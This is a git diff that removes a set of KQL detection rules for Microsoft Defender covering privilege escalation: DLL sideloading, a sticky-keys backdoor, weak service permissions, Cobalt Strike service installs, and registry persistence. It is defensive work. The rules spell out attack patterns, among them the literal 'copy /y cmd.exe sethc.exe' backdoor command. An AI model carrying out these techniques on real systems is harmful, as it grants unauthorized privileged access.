diff --git a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql deleted file mode 100644 index 1282a6c6..00000000 --- a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/02 -// Level: high -// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) -// Tags: attack.execution, attack.privilege_escalation, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe") \ No newline at end of file diff --git a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql b/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql deleted file mode 100644 index 0e968bc4..00000000 --- a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz @bczyz1, oscd.community -// Date: 2020/10/11 -// Level: medium -// Description: Detects value modification of registry key containing path to binary used as screensaver. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql b/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql deleted file mode 100644 index 17643f89..00000000 --- a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Sreeman -// Date: 2020/02/18 -// Level: critical -// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. -When the sticky keys are "activated" the privilleged shell is launched. - -// Tags: attack.t1546.008, attack.privilege_escalation -DeviceProcessEvents -| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe" \ No newline at end of file diff --git a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql deleted file mode 100644 index 8867fa02..00000000 --- a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql b/Privilege Escalation/Potential_7za.DLL_Sideloading.kql deleted file mode 100644 index f1cc961b..00000000 --- a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/06/09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql b/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql deleted file mode 100644 index e192e978..00000000 --- a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "AVKkid.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql b/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql deleted file mode 100644 index 000b03f0..00000000 --- a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend 
Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql b/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql deleted file mode 100644 index 49da9307..00000000 --- a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Den Iuzvyk -// Date: 2020/07/15 -// Level: low -// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. -An attacker can use this to authenticate to Azure AD in a browser as that user. - -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith 
"\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql deleted file mode 100644 index 1c5d0f3d..00000000 --- a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerDU.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql deleted file mode 100644 index 7d335d90..00000000 --- a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file 
diff --git a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql deleted file mode 100644 index 4ca5d408..00000000 --- a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql deleted file mode 100644 index e448ad48..00000000 --- a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql +++ /dev/null 
@@ -1,8 +0,0 @@ -// Author: Wojciech Lesicki -// Date: 2021/06/29 -// Level: high -// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. - -// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 -DeviceRegistryEvents -| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql deleted file mode 100644 index 7d53df8f..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")) \ No newline at end of file 
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql deleted file mode 100644 index 85e52e34..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbghelp.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql deleted file mode 100644 index bafb67b9..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql deleted file mode 100644 index d6f4a3c3..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql deleted file mode 100644 index 4d8a43ae..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/14 -// Level: medium -// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql deleted file mode 100644 index 05e33118..00000000 --- a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql b/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql deleted file mode 100644 index f843422e..00000000 --- a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: high -// Description: Detects potential DLL sideloading of "EACore.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql b/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql deleted file mode 100644 index fa643858..00000000 --- a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: high -// Description: Detects potential DLL sideloading of "edputil.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql b/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql deleted file mode 100644 index 27f1e8dc..00000000 --- a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql b/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql deleted file mode 100644 index 3d46efa4..00000000 --- a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/21 -// Level: high -// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql b/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql deleted file mode 100644 index 3fce189b..00000000 --- a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/04/17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql b/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql deleted file mode 100644 index 163f4b42..00000000 --- a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\")) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql b/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql deleted file mode 100644 index 0af11ee9..00000000 --- a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql
deleted file mode 100644
index 5512073b..00000000
--- a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql b/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
